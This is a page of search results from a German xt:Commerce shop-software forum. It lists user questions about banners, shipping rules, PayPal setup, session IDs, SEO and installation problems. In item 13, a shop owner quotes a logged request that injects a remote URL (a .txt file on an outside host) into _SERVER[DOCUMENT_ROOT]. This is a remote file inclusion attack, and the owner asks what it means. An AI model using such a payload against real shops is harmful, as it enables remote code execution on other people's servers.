Jump to content
xt:Commerce Community Forum

Search the Community

Showing results for tags 'thema'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • xt:Commerce - Professionelle eCommerce Shopsoftware
    • Fragen zur Software
    • xt:Commerce Plugins
    • xt:Commerce 4 Sprachen
    • xt:Commerce Online Handbuch
    • Häufige Fragen (FAQ)
    • Fragen zur Software (Pre Sale)
    • Anleitungen - Patches - Downloads
  • xt:Commerce Office - Shop & Warenwirtschaft
    • Allgemeine Fragen
  • xt:Commerce Allgemein
  • xt:Commerce 3 Shopsoftware Community Area (nur Lesen)
    • Allgemeine Diskussionen
    • Installation und Konfiguration
    • Shopbereich
    • Admininterface
    • Modul Entwicklung
    • Template System
    • xt:Commerce Schnittstellen ERP Systeme
    • PHP & MysQL Forum
    • HTML & CSS

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biografie


Wohnort


Interessen


Beruf

Found 32 results

  1. Hoffentlich tauchen die alten Betr?ge bald wieder auf ... ich mach halt mal weiter... wieder ein interessanter Beitrag (von manica) http://www.xt-commerce.com/modules/ipboard...-post-8074.html
  2. Hallo zusammen, ich versuche einen Slide also 3-5 Bilder in einem Fenster auf der Startseite anzuzeigen und die dann nach circa 5-10 sekunden wechseln. Hab jetzt mal mal unter http://www.serie3.info/s3slider/ versucht diesen einzubauen. Ist es nicht so das die Javascripts in der js.php mit pfad angegeben werden. Dort packe ich natürlich dann auch die Javascripte per FTP rein. Stylsheet ebenso...also Angabe in der css/css.php des Templates, anschliessen das Stylsheet in diesen angegebenen Ordner per FTP. So und nun...muss ich den HTML Code also den Aufruf des eigentlichen Slides in die Index.html des Templates packen? Einfach so oder lieber über einen eigenen Content im Backend? Bitte um Hilfe Gruß Markus
  3. Problem gelöst
  4. Tach zusammen. Ich habe folgendes Problem und wollte nur wissen ob es dazu bereits einen Lösungsansatz gibt, oder hier inidivduell nachgeholfen werden muss. Es handelt sich dabei um einen B2B Shop. Grundsätzlich gillt, ab einem Bestellwert von 200€ fallen keine Versandkosten an. Das ist soweit nicht schwierig. Nun gibt es aber auch Produkt die Versandkostenfrei sind. Dafür gibt es ein Plugin, dass bereits eingesetzt wird und auch funktioniert. Jetzt ist aber eine neue Situation entstanden. Werden Produkte mit einem gesamtwert unter 200€ aber zusätzlich ein Produkt das Versandkostenfrei ist, sollen keine Versandkosten berechnet werden. Die Versandkostenfreien Produkte, kosten nebenbei nichts, sind "umsonst". Hat jemand eine Ahnung ob es dafür bereits ein Plugin gibt, oder wie es eventuell sogar ober die Shopeigenen Mittel realisiert werden kann? Wäre für jeden Hinweis wirklich sehr dankbar! Greetz
  5. Hallo, wollte nachfragen ob es schon eine Möglichkeit gibt, eine Kategorie nur für Premiumkunden zugänglich zu machen, die z.B. einen Monats/Jahresbeitrag zahlen eventuell über den Shop. Zum Beispiel der Kunde zahlt einen Monatsbeitrag von 10 Euro und hat einen Monat Zugang zu einer bestimmten Kategorie/Enzyklopädie/Lexikon etc. !? Habe im Forum schon nach ähnlichem gesucht, leider ohne Erfolg Würde mich über eine Antwort freuen. Grüße
  6. Hallo liebe XTC Gemeinde, ich habe ein lästiges Bannerproblem. Ich weiß "Suche benutzen", hab ich schon. Mittlerweiler stöber ich schon seit zwei Tagen herum und gehe jedem Lösungsvorschlag nach, aber ohne Erfolg. Einige Beiträge führen ins Sponsorenforum andere auf die Forum Hauptseite, aber Hilfe habe ich keine erfahren. Da ich nicht mehr weiter weiß, erstelle ich jetzt in Echtzeit ein Banner und schreibe euch genau auf was passiert. In der Hoffnung das jemand meinen Fehler sieht. Ich arbeite Lokal auf meinem PC mit xtcommerce v3.0.4 SP1 - release 01.Okt.2005, AppServ v 2.5.5 und WinMYSQL. Gleichzeitig baue ich den Shop online auf http://www.rivotech-electronics.de bei 1&1 auf. Schritt 1. Gehe in den Banner Manager und lege ein neues Banner an. Titel: Test Banner URL: http://localhost/shop24/shop_content.php?coID=15 Banner Gruppe: BANNER alles ausprobiert Großbuchstaben, kleine... Bilddatei: F:\RivoTech_Shop\Cover\xbox\doom3_xbox.jpg Schritt 2. Banner einfügen. Dann kommt wieder der Banner Manger mit zwei grünen Balken. Erfolg. Hochgeladene Datei wurde erfolgreich gespeichert. Erfolg. Der Banner wurde eingefügt. Bild wurde ordnungsgemäß im Shopverzeichnis unter /images/banner/ abgelegt. Aber im Banner Manger müßte doch normalerweise ein kleines Vorschaubild des Banners angezeigt werden. Oder irre ich mich da? Schritt 3. Klicke dann in Menueleiste auf SHOP Indexseite wird aufgerufen. Wieder kein Banner sichtbar. :mad:Shit. Schritt 4. So nun schaue ich mir den index.html code im shoptemplate an, ob auf das banner verwiesen wird. Folgender Eintrag: {if $BANNER} <table width="100" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td>{$BANNER}</td> </tr> </table> {/if} Alles OK, oder? Schritt 5. Gehe nun noch in die Banners.php. Folgender Eintrag: <?php /* ----------------------------------------------------------------------------------------- $Id: banners.php 899 2005-04-29 02:40:57Z hhgag $ XT-Commerce - community made shopping http://www.xt-commerce.com Copyright © 2003 XT-Commerce Released under the GNU General Public License ---------------------------------------------------------------------------------------*/ require_once(DIR_FS_INC . 'xtc_banner_exists.inc.php'); require_once(DIR_FS_INC . 'xtc_display_banner.inc.php'); require_once(DIR_FS_INC . 'xtc_update_banner_display_count.inc.php'); if ($banner = xtc_banner_exists('dynamic', 'banner')) { $smarty->assign('BANNER',xtc_display_banner('static', $banner)); } ?> Auch alles OK. Habe auch schon die index.html durch die Originale ersetzt. Ohne Ergebnis. Wenn ich mir den Index.html code nach der Generierung anschaue, finde ich auch keinen Bannerverweis im Quelltext. Ich gehe mal davon aus, daß die Variable nicht übergeben wird. Was nun aber sehr verwunderlich ist: Geht man später wieder in den Banner Manager, werden in der Statistik Banneranzeigen durch den blauen Balken angezeigt, obwohl ich keine Banner sehe. WOW!!!!!!!Irre Desweiteren: Wenn ich nun genau dieses Banner mit samt dem Bild lösche kommt folgende Fehlermedung: Fehler: Bild existiert nicht, obwohl es ordungsgemäß bei Erstellung gespeichert und abgelegt wurde Erfolg: Der Banner wurde gelöscht. Bilder von Produkten oder Content Inhalten werden super dargestellt. Da ich mich nur beschränkt auskenne in Sachen PHP und HTML Prog. hoffe ich das mir vielleicht ein paar erfahrene Kräfte unter die Arme greifen können. Für Hilfe wäre ich sehr dankbar.
  7. Hallo Leute, Ich weiß leider nicht ob es gegen die Forenregeln verstößt oder ob ich im falschen Forum bin, aber ich hab mal eine Frage an euch. Ich arbeite grade für einen Kunden an den letzten Sachen für seinen Shop (Veyton). Da das mein erster Shop ist, bin Student und mache sonst eher kleinere Projekte, hab ich am Anfang nur einen circa Preis genannt. Aber wie es nunmal so ist im Leben wollte der Kunde immer mal hier was neues und dann noch das ändern, ihr kennt das ja sicher….. also wie gesagt, der Shop nähert sich dem Ende und so langsam muss ich mir Gedanken fürs Honorar machen. Und da es jetzt doch so viel mehr ist und ich so ne preis vor Augen habe wollte ich mal nachfragen ob meine Preisvorstellung VÖLLIG übertrieben sind und jenseits von gut und böse. Lange Rede kurzer Sinn… hier mal aufgelistet was alles so gemacht wurde. - Entwicklung des Designs für den Shop - Aufsetzten des Shops mit installieren von neuen Modulen und Anbindung an PayPal ect. - Umsetzung eines komplexen Templates mit drei 3 Farbbereichen, d.H. 3 Templates für alle Unterseiten. - Einpflegen der meisten Artikel (ca. 250 - 300 Stück), inkl. Master/Slave Artikel, teilweise mit Fotos selber machen und selbst Text schreiben, meta-tags ect. - 13 Seiten mit normalen Content inkl. Google Maps API, Galleriefunktion. - Den ganzen Grafikkram (PDFs, Angebote, Animierte gifs auf der Startseite) - Interaktive Startseite mit wechselnen Angeboten und neusten Produkten mit PHP/JavaScript (inklusive Backendseite zum einfachen pflegen dieser Elemente) - Programmieren eines "Treuekarten Moduls" zum sammeln von Treuepunkten inkl. automatischer Versand von Gutscheincodes in SMARTY/PHP (durch das Gutscheinmodul). - Einbindung dieses Moduls ins Shopsystem (Mailversand, Backend, Sicherheitsüberprüfung) - Kleine Funktion in PHP wie z.B. das angemeldete Kunden Emails an Freunde Schicken können zum werben ect. - Kleine Änderungen am Shopsystem (z.B. MindestBestellwert usw.) Neben dem eigentlichen Shop und dem Template (komplett geändert) war natürlich das Treuekartenmodul die meiste Arbeit. Also jetzt zum Eingemachten…. sind 6000 Euro für die Arbeit gerechtfertigt? Bin jetzt einfach mal 300 Stunden ausgegangen weil ich hinterher nichtmehr genau aufgeschrieben habe. Dürften aber eigentlich ein paar mehr sein. Ist der Preis wirklich realistisch oder ist ein viel geringer Preis üblich… vielleicht habt ihr da mehr Erfahrung. schon mal danke im Voraus…. Schönen Sonntag noch, Markus
  8. Hallo Leute, wollte heute in meinen Shop Paypal integrieren aber leider klappt dies nicht. Am Ende des Bestellvorgangs kommt immer: leider kann diese Zahlart aus technischen Gründen nicht zur Verfügung gestellt werden. Woher bekomme ich meine API ? Weil Paypal will immer einen API namen wissen Aber woher soll ich diesen denn wissen ?? Vielen Dank Mit freundlichen Grüßen Chris
  9. Hallo, auch wenn des öfteren behandelt, eine "neue" Frage zum Thema Copyright: Darf die Verlinkung zu XTC an sich heraus genommen werden, so dass ausschließlich der Copyright-Text im Footer steht, oder ist die Verlinkung ebenso Bestandteil des Copyright-Vermerks ? Ist das Herausnehmen der Verlinkung abmahngefährdet ? Würde mich sehr interessieren. Ich denke, dass das für die Entwickler von XT:Commerce auch interessant wäre. Es geht um die 3.0.4 Version. Danke im voraus !!! Gruß
  10. Da steht ja vieles drin...aber nicht so leicht zu finden. Wie richte ich die Versandkosten ein?Sie sind ja unterschiedlich fuer jedes Produkt. Wenn mir einer nen link auf eine bereits gegebene Antwort gibt...oder es kurz verraet...danke. Nutzen tue ich xt commerce 3
  11. Hallo zusammen! Ich möchte AGB's definieren, jedoch fehlt der entsprechende Content. Bei der Bestätigung der AGB's innerhalb des Bestellvorgangs wird meine Startseite angezeigt. Nun mal drei Fragen zum Thema. Wie kann ich einen neuen Content für AGB's erstellen? Wie kriege ich es hin, diesen neuen AGB-Content anstatt der Startseite im Bestellvorgang anzeigen zu lassen? Wie kann ich ggf. diese ganze AGB Geschichte im Bestellvorgang komplett ausblenden? Wäre Euch wirklich sehr dankbar für einen Hinweis/Tipp. Mit diesem AGB Problem steht oder fällt momentan nämlich der ganze Shop. Das Ding muss endlich online gehen. RD
  12. hallo, ich habe echte probleme, seiten wie contact form, imprint etc im dateisystem zu finden, bzw. zu verlinken. ich wüsste gern beispielhaft, wo das kontaktformular liegt, welche dateien dazu gehören und wie ich darauf verlinken kann. danke, barry
  13. Guten Tag, heute ist mir im Who's online Modul dieser Besucher aufgefallen. Er hat offensichtlich versucht auf Shopinterne Daten zuzugreifen, mit folgendem, per Hand eingegebenen Aufruf: 00:07:38 0 Guest 91.121.89.135 20:09:31 20:09:31 /index.php?cat=c802_Handys---Navigation.html%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.anyche.com/goods_img1/satu.txt?? Was könnte er damit bezwecken wollen und wie muss ich das bewerten? Vielen Dank für Ratschläge.
  14. Hi, ich würde gerne bestimmte Image Bilder im Header-Bereich anzeigen lassen, die je nach Thema wechseln. Ich wollte dies mit der Bannerfunktion lösen. Der Aufruf über die index.php klappt auch wunderbar, nun möchte ich aber beim Menüpunkt x ein anderes Bannerbild als beim Menüpunkt y haben. Leider kann ich ja von der index.html aus nicht herausfinden, welcher Menüpunkt gerade aktiviert wurde. Oder doch? Wenn ich über xtc_show_category.inc eine php-Abfrage reinbaue, packt er sie mir ja nicht in die {BANNER} rein. Wie kriege ich es sonst hin, dass er das Bild mir im {BANNER} ausgibt? if( ($foo[$cid]['name'].$ProductsCount == 'x')) { echo('<div id="banner1"> <img src="templates/meintemplate/img/banner1.jpg" /></div>'); } [/PHP] Kann mir jemand helfen?
  15. Bin gerade interessiert an Ihr Shopsystem ... Leider wird auch nie über Mac gesprochen. Wie läuft es unter Mac OS X ? Dann hätte ich gerne noch gewusst : Für die Warenwirtschaft / Faktura Gibt es da ein besonders empfohlenes Programm ? Womit Ihr "system" getestet wurde ? Möchte eigentlich komplett ein System für das Mac OS haben ... Gibt es da Empfehlungen Erfahrung ? MFG
  16. Hallo Zusammen, gibt es in diesem Shop 3.04 eine Möglichkeit (ohne Codeänderungen), die Betreffzeilen in den E-Mails zu ändern und zwar auch mehrsprachig? So z.B. nach der Registrierung in den Betreffzeilen der Mails verschiedensprachige Texte zu pflegen? Und wenn ja wie?? Danke und Gruß Karsten
  17. Leidiges Thema: Sesion Ids und Xt Frohe Ostern erstmal an alle Bin mit meinem Latein am Ende, die Sesion Ids werden von Tag zu Tag obwohl ich schon Google über verschiedene Wege mitgeteilt habe... Der Shop hat erst 150 Seiten, aber schon 200 Sesio Ids im Goo... Index. Tendenz steigend Habe schon folgendes unternommen um dies abzustellen und die Seiten aus dem Index zu entfernen: 1. Sitemap in Webamstertool eingereicht 2. per Robots gesperrt - Disallow: /shop/*?XTCsid 3. im Admin Spider Sessions vermeiden? Auf True 4. 301 Weiterleitung auf die Url ohne Session ID - http://www.gogozone.de/blog/xt-commerce-session-id-aus-google-entfernen-25/ Jetzt warte ich ab, leider kommen aber immer meht Sesion in Index Was ich Heute entdeckt habe – zu oben genannten Punkt 4 Sehe jetzt aber das der Ordner Includes über die robtos gesperrt ist… Disallow: /shop/includes/ So funktioniert das aber leider nicht… Oder liege ich da falsch?? Die Sperrung per robots war eine Voreinstellung vom Templates So, hoffe ich kann Nachts wieder gut schlafen Gruss Balou
  18. Hallo, Ich versuche gerade meinen Modeschmuck Shop für die SuMas zu optimieren... Da Google kaum Produktseiten indiziert möchte ich die Reihenfolge der Meta-Titles verändern. Momentan ist der Titel so: Unterunterseite - Unterseite - Shopname ich möchte es aber so haben: Shopname - Unterseite - Unterunterseite also genau andersrum..wo kann ich das ändern??? vielen dank schonmal..... kamui
  19. hi leute. ich habe bei meinem onlineshop (ich vertreibe software) noch immer eine alte oscommerce version laufen. da ich der meinung bin dass man ein gut laufendes system nicht ändern soll, möchte ich natürlich zu 100% sicher gehen dass auch alle meine funktionalitäten die ich mir selber im oscommerce programmiert oder gekauft habe auch hier wieder zu finden sind. deshalb nun meine frage bevor ich hier zuschlage und kaufe. gibt es die möglichkeit artikel zu importieren? ich habe eine separate warenwirtschaft bei der ich als textdatei alle meine artikel ausgeben kann. die textdatei ist frei formatierbar. ich möchte nun nicht online alle daten immer eingeben und ändern, sondern nur über die warenwirtschaft arbeiten, dort eine textdatei ausgeben lassen und diese dann im shop importieren. wie weit ist sowas möglich oder gibt es das schon für xt-commerce? vor allem wie wird das gehandhabt wenn ja schon artikel in der db gespeichert sind und in der warenwirtschaft nur ein paar dazugekommen sind? wäre super wenn ihr mir da infos zukommen lassen könntet. falls es sowas gibt... kann man das irgendwo testen? mfg Proma
  20. Hallo Leute, ich habe folgendes (wohl altbekanntes) Problem: Nach einer scheinbar erfolgreichen Installation wird nach einem Klick auf den "Catalog" Button auf der install_finished.php Seite eine leere Index.php angezeigt. Und bevor jetzt alle im Chor "Pfade richtg setzen und Berechtigungen vergeben" singen, möchte ich betonen, dass ich die richtige Rechtvergabe bestimmt 40mal überprüft habe (der Check am Anfang der Installation hat auch nicht gemeckert). Bei den Pfaden bin ich mir nicht 100%ig sicher. Ich habe mal einen Auszug aus der configure.php beigefügt: define('HTTP_SERVER', 'http://www.Kunde.de'); // eg, http://localhost - should not be empty for productive servers define('HTTPS_SERVER', 'https://www.Kunde.de'); // eg, https://localhost - should not be empty for productive servers define('ENABLE_SSL', true); // secure webserver for checkout procedure? define('DIR_WS_CATALOG', '/onlineshop/'); // absolute path required define('DIR_FS_DOCUMENT_ROOT', '/home/httpd/vhosts/kunde.de/httpdocs/onlineshop/'); define('DIR_FS_CATALOG', '/home/httpd/vhosts/kunde.de/httpdocs/onlineshop/'); define('DIR_WS_IMAGES', 'images/'); define('DIR_WS_ORIGINAL_IMAGES', DIR_WS_IMAGES .'product_images/original_images/'); define('DIR_WS_THUMBNAIL_IMAGES', DIR_WS_IMAGES .'product_images/thumbnail_images/'); define('DIR_WS_INFO_IMAGES', DIR_WS_IMAGES .'product_images/info_images/'); define('DIR_WS_POPUP_IMAGES', DIR_WS_IMAGES .'product_images/popup_images/'); define('DIR_WS_ICONS', DIR_WS_IMAGES . 'icons/'); define('DIR_WS_INCLUDES',DIR_FS_DOCUMENT_ROOT. 'includes/'); define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/'); define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/'); define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/'); define('DIR_WS_LANGUAGES', DIR_FS_CATALOG . 'lang/'); define('DIR_WS_DOWNLOAD_PUBLIC', DIR_WS_CATALOG . 'pub/'); define('DIR_FS_DOWNLOAD', DIR_FS_CATALOG . 'download/'); define('DIR_FS_DOWNLOAD_PUBLIC', DIR_FS_CATALOG . 'pub/'); define('DIR_FS_INC', DIR_FS_CATALOG . 'inc/'); // define our database connection define('DB_SERVER', 'localhost'); // eg, localhost - should not be empty for productive servers define('DB_SERVER_USERNAME', 'someuser'); define('DB_SERVER_PASSWORD', 'somepassword'); define('DB_DATABASE', 'somedatabase'); define('USE_PCONNECT', 'false'); // use persistent connections? define('STORE_SESSIONS', ''); // leave empty '' for default handler or set to 'mysql'[/PHP] Ich hoffe es kann mir jemand helfen ... denn meine Nerven sind langsam am Ende Ich habe wirklich alle Threads zu diesem Thema durchgewühlt und komme ums verrecken nicht weiter. Viele Grüße, cal
  21. Hi, gibt es irgendwiene m?glichkeit das Theme des Shops f?r jeden User Seperat anzugeben um z.b. je nach Kundengruppe das Template zu ver?ndern :grml: :grml: mfg Robin
  22. Hallo zusammen! Das "mart guestbook" läuft bei mir unter V3.0.4SP2.1 einwandfrei! Leider gibt es zwei kleine "Schönheitsfehler", die ich gerne geändert hätte, selbst jedoch nicht ändern kann, da ich keine Ahnung vom zu verändernden Code habe. Ich hatte bereits eine Nachricht an Stephan Spies von optima software geschrieben und um Hilfestellung, oder einen Tipp gebeten ... und bis heute keine Antwort erhalten. 1) Kann mir jemand sagen, welche Änderungen notwendig sind, damit Absätze und Zeilenumbrüche, die der Kunde beim Schreiben eines Beitrages macht mit übernommen werden und auch später so im fertigen Beitrag angezeigt werden? Momentan werden alle geschriebenen Wörter nur aneinander gereiht ... das sieht nicht wirklich sexy aus! 2) Der Admin hat die Möglichkeit, im Backend des GB jeden Beitrag zu kommentieren oder zu verändern. Welche Änderungen müssen durchgeführt werden, wenn diese Kommentare oder Ergänzungen zum Kundenbeitrag in einer anderen Farbe dargestellt werden sollen (damit man auf den ersten Blick den original Beitrag vom Admin-Kommentar unterscheiden kann)? Es würde schon ausreichen, wenn NUR der Admin <HTML> code benutzen dürfte (welcher ja Standardmäßig "ausgeschaltet" ist) Ich hoffen, dass es jemanden gibt, der eine (zwei) Lösung(en) weiß. Vielen Dank Gruß back@me
  23. Hallo, ich möchte hier das Thema SessionID nochmal auf den Tisch bringen. Problem: Im Internet Explorer wird die Session ID immer an die URL gehängt. Nachdem ich hier einiges darüber gelesen habe und auch ausprobiert habe, komme ich zu dem Schluss, dass das ein Fehler im System ist. Deshalb meine Bitte an die Entwickler, sich dieses Problem noch einmal anzuschauen. Es ist z.B. so, dass, wenn ich zwischen dem Shop und der Administration wechsel irgenwann die Session ID hinter der URL verschwindet. Auch wenn ich mich dann auslogge, bliebt sie abwesend, es wird eine neue Session angelegt, die dann auch erhalten bleibt. Offenbar landet sie dann doch im Cookie. Also irgend etwas ist da faul. Leider bin ich selber nicht schlau genug das herauszufinden.
  24. Hallo Leute, bin relativ neu hier und komme jetzt ums direkte Frage stellen leider nicht rum. Ich m?chte die Artikelmerkmale f?r die Kategorien festlegen. Mein System ?bernimmt diese aber leider immer nur bei dem jeweiligen Artikel..... Den Artikel habe ich in der Kategorie angelegt und diese Kategorie hat nun mehrere Artikel mit den selben Merkmalen. Wie bekomme ich die Merkmale nun auf die Kategorie. Pls help. ?ber Hilfe oder feedback w?rde ich mich sehr freuen. Danke aus Hamburg Gr?sse Stephan
×
×
  • Create New...